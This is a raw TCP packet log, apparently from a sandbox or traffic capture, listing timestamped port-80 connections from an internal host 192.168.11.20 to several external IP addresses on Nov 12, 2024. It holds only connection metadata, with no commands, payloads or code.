                                                                                                                            Nov 12, 2024 15:32:52.842777014 CET4976880192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:32:52.959870100 CET80497683.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:52.979115009 CET80497683.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:52.979325056 CET4976880192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:32:54.351980925 CET4976880192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:32:54.470030069 CET80497683.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:55.369453907 CET4976980192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:32:55.504607916 CET80497693.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:55.504905939 CET4976980192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:32:55.513207912 CET4976980192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:32:55.632649899 CET80497693.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:55.650116920 CET80497693.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:55.650387049 CET4976980192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:32:57.023288012 CET4976980192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:32:57.140317917 CET80497693.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:58.040738106 CET4977080192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:32:58.176886082 CET80497703.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:58.177058935 CET4977080192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:32:58.185039997 CET4977080192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:32:58.185067892 CET4977080192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:32:58.185115099 CET4977080192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:32:58.319587946 CET80497703.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:58.319705009 CET80497703.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:58.319818974 CET80497703.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:32:58.319892883 CET80497703.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:00.712081909 CET4977180192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:33:00.846951962 CET80497713.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:00.847081900 CET4977180192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:33:00.852329016 CET4977180192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:33:00.986290932 CET80497713.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:00.987587929 CET80497713.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:00.987597942 CET80497713.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:00.987859011 CET4977180192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:33:00.989943027 CET4977180192.168.11.203.33.130.190
                                                                                                                            Nov 12, 2024 15:33:01.123833895 CET80497713.33.130.190192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:06.286231995 CET4977280192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:06.422755003 CET8049772199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:06.422967911 CET4977280192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:06.430661917 CET4977280192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:06.570781946 CET8049772199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:06.570797920 CET8049772199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:06.570807934 CET8049772199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:06.571036100 CET4977280192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:07.942773104 CET4977280192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:08.960237980 CET4977380192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:09.084017038 CET8049773199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:09.084248066 CET4977380192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:09.092072964 CET4977380192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:09.209547997 CET8049773199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:09.227420092 CET8049773199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:09.227469921 CET8049773199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:09.227505922 CET8049773199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:09.227658033 CET4977380192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:09.227798939 CET4977380192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:09.233069897 CET8049773199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:09.233201027 CET4977380192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:10.598475933 CET4977380192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:11.616027117 CET4977480192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:11.740223885 CET8049774199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:11.740509987 CET4977480192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:11.752958059 CET4977480192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:11.753031015 CET4977480192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:11.870579004 CET8049774199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:11.870620012 CET8049774199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:11.870650053 CET8049774199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:11.870743036 CET8049774199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:11.870831966 CET8049774199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:11.870981932 CET8049774199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:11.871016026 CET8049774199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:11.888657093 CET8049774199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:11.888705969 CET8049774199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:11.888741016 CET8049774199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:11.888868093 CET4977480192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:11.888989925 CET4977480192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:11.895585060 CET8049774199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:11.895788908 CET4977480192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:13.254192114 CET4977480192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:14.271706104 CET4977580192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:14.411540985 CET8049775199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:14.411739111 CET4977580192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:14.417087078 CET4977580192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:14.555088043 CET8049775199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:14.555140018 CET8049775199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:14.555175066 CET8049775199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:14.555422068 CET4977580192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:14.557270050 CET4977580192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:14.691839933 CET8049775199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:19.817847967 CET4977680192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:19.952356100 CET8049776199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:19.952662945 CET4977680192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:19.961199045 CET4977680192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:20.096149921 CET8049776199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:20.096163034 CET8049776199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:20.096237898 CET8049776199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:20.096457958 CET4977680192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:21.471190929 CET4977680192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:22.488537073 CET4977780192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:22.605952024 CET8049777199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:22.606228113 CET4977780192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:22.613907099 CET4977780192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:22.738725901 CET8049777199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:22.757242918 CET8049777199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:22.757293940 CET8049777199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:22.757354021 CET8049777199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:22.757474899 CET4977780192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:22.757539988 CET4977780192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:22.761090040 CET8049777199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:22.761338949 CET4977780192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:24.126877069 CET4977780192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:25.147224903 CET4977880192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:25.264568090 CET8049778199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:25.264764071 CET4977880192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:25.272731066 CET4977880192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:25.272809982 CET4977880192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:25.390064955 CET8049778199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:25.390384912 CET8049778199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:25.390399933 CET8049778199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:25.390408993 CET8049778199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:25.390419006 CET8049778199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:25.390428066 CET8049778199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:25.390438080 CET8049778199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:25.407622099 CET8049778199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:25.407639027 CET8049778199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:25.407651901 CET8049778199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:25.407886982 CET4977880192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:25.413623095 CET8049778199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:25.413836956 CET4977880192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:26.782412052 CET4977880192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:27.799951077 CET4977980192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:27.935018063 CET8049779199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:27.935221910 CET4977980192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:27.940453053 CET4977980192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:28.075597048 CET8049779199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:28.075615883 CET8049779199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:28.075627089 CET8049779199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:28.075926065 CET4977980192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:28.077950001 CET4977980192.168.11.20199.59.243.227
                                                                                                                            Nov 12, 2024 15:33:28.212038040 CET8049779199.59.243.227192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:36.170994043 CET4978080192.168.11.20206.119.81.121
                                                                                                                            Nov 12, 2024 15:33:36.483921051 CET8049780206.119.81.121192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:36.484174967 CET4978080192.168.11.20206.119.81.121
                                                                                                                            Nov 12, 2024 15:33:36.489474058 CET4978080192.168.11.20206.119.81.121
                                                                                                                            Nov 12, 2024 15:33:36.804472923 CET8049780206.119.81.121192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:36.804577112 CET8049780206.119.81.121192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:36.804878950 CET4978080192.168.11.20206.119.81.121
                                                                                                                            Nov 12, 2024 15:33:36.806917906 CET4978080192.168.11.20206.119.81.121
                                                                                                                            Nov 12, 2024 15:33:37.119842052 CET8049780206.119.81.121192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:41.812578917 CET4978180192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:33:42.134032011 CET804978147.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:42.134300947 CET4978180192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:33:42.142107010 CET4978180192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:33:42.464503050 CET804978147.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:42.465173960 CET804978147.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:42.465220928 CET804978147.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:42.465440989 CET4978180192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:33:43.653800964 CET4978180192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:33:44.671263933 CET4978280192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:33:44.995014906 CET804978247.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:44.995261908 CET4978280192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:33:45.002990961 CET4978280192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:33:45.323450089 CET804978247.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:45.323919058 CET804978247.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:45.323992014 CET804978247.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:45.324228048 CET4978280192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:33:46.512507915 CET4978280192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:33:47.531838894 CET4978380192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:33:47.852586985 CET804978347.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:47.852868080 CET4978380192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:33:47.860832930 CET4978380192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:33:47.860907078 CET4978380192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:33:48.181205034 CET804978347.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:48.181246042 CET804978347.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:48.181274891 CET804978347.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:48.181304932 CET804978347.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:48.181852102 CET804978347.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:48.181902885 CET804978347.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:48.182106972 CET4978380192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:33:49.371247053 CET4978380192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:33:50.388745070 CET4978480192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:33:50.714140892 CET804978447.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:50.714437008 CET4978480192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:33:50.720370054 CET4978480192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:33:51.050955057 CET804978447.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:51.050966024 CET804978447.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:51.050973892 CET804978447.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:51.051337957 CET4978480192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:33:51.053392887 CET4978480192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:33:51.386769056 CET804978447.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:56.059827089 CET4978580192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:33:56.382410049 CET8049785154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:56.382745028 CET4978580192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:33:56.390572071 CET4978580192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:33:56.713064909 CET8049785154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:56.719913006 CET8049785154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:56.719928980 CET8049785154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:56.720135927 CET4978580192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:33:57.900619984 CET4978580192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:33:58.918185949 CET4978680192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:33:59.235781908 CET8049786154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:59.235951900 CET4978680192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:33:59.243787050 CET4978680192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:33:59.556941032 CET8049786154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:59.563903093 CET8049786154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:59.563947916 CET8049786154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:33:59.564053059 CET4978680192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:34:00.759515047 CET4978680192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:34:01.776880026 CET4978780192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:34:02.101162910 CET8049787154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:02.101360083 CET4978780192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:34:02.109790087 CET4978780192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:34:02.109862089 CET4978780192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:34:02.434086084 CET8049787154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:02.434129953 CET8049787154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:02.434159040 CET8049787154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:02.434263945 CET8049787154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:02.434294939 CET8049787154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:02.434324026 CET8049787154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:02.441257954 CET8049787154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:02.441303015 CET8049787154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:02.441564083 CET4978780192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:34:03.618169069 CET4978780192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:34:04.635623932 CET4978880192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:34:04.957448006 CET8049788154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:04.957685947 CET4978880192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:34:04.962903976 CET4978880192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:34:05.282706022 CET8049788154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:05.288237095 CET8049788154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:05.288248062 CET8049788154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:05.288592100 CET4978880192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:34:05.290451050 CET4978880192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:34:05.615592957 CET8049788154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:10.306292057 CET4978980192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:34:10.547792912 CET804978984.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:10.547935963 CET4978980192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:34:10.555835009 CET4978980192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:34:10.798808098 CET804978984.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:10.799591064 CET804978984.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:13.086903095 CET4979080192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:34:13.327068090 CET804979084.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:13.327231884 CET4979080192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:34:13.335037947 CET4979080192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:34:13.575136900 CET804979084.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:13.575241089 CET804979084.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:15.867558002 CET4979180192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:34:16.107140064 CET804979184.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:16.107387066 CET4979180192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:34:16.115364075 CET4979180192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:34:16.115469933 CET4979180192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:34:16.359406948 CET804979184.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:16.359762907 CET804979184.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:18.648308039 CET4979280192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:34:18.890261889 CET804979284.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:18.890585899 CET4979280192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:34:18.895777941 CET4979280192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:34:19.146665096 CET804979284.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:19.146723986 CET804979284.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:19.146769047 CET804979284.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:19.146811008 CET804979284.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:19.146855116 CET804979284.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:19.146897078 CET804979284.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:19.146939039 CET804979284.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:19.146984100 CET804979284.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:19.147027969 CET804979284.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:19.147113085 CET4979280192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:34:19.147113085 CET4979280192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:34:19.147269011 CET4979280192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:34:19.147430897 CET4979280192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:34:19.149190903 CET4979280192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:34:19.397979021 CET804979284.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:24.162633896 CET4979380192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:34:24.299072981 CET8049793208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:24.299391985 CET4979380192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:34:24.307627916 CET4979380192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:34:24.444039106 CET8049793208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:26.834124088 CET4979480192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:34:26.970221996 CET8049794208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:26.970484972 CET4979480192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:34:26.979526043 CET4979480192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:34:27.115643978 CET8049794208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:29.505631924 CET4979580192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:34:29.650516987 CET8049795208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:29.650728941 CET4979580192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:34:29.658507109 CET4979580192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:34:29.658535957 CET4979580192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:34:29.794750929 CET8049795208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:32.192068100 CET4979680192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:34:32.328311920 CET8049796208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:32.328517914 CET4979680192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:34:32.334269047 CET4979680192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:34:32.520824909 CET8049796208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:32.753819942 CET8049796208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:32.753840923 CET8049796208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:32.753850937 CET8049796208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:32.753956079 CET8049796208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:32.753968000 CET8049796208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:32.754057884 CET4979680192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:34:32.754224062 CET4979680192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:34:32.756076097 CET4979680192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:34:32.892280102 CET8049796208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:37.769085884 CET4979780192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:34:37.936220884 CET8049797203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:37.936578035 CET4979780192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:34:37.944828033 CET4979780192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:34:38.111823082 CET8049797203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:38.124049902 CET8049797203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:38.124108076 CET8049797203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:38.124305964 CET4979780192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:34:39.454123974 CET4979780192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:34:40.471736908 CET4979880192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:34:40.639731884 CET8049798203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:40.639908075 CET4979880192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:34:40.654345036 CET4979880192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:34:40.821537018 CET8049798203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:34:40.832247972 CET8049798203.161.49.193192.168.11.20
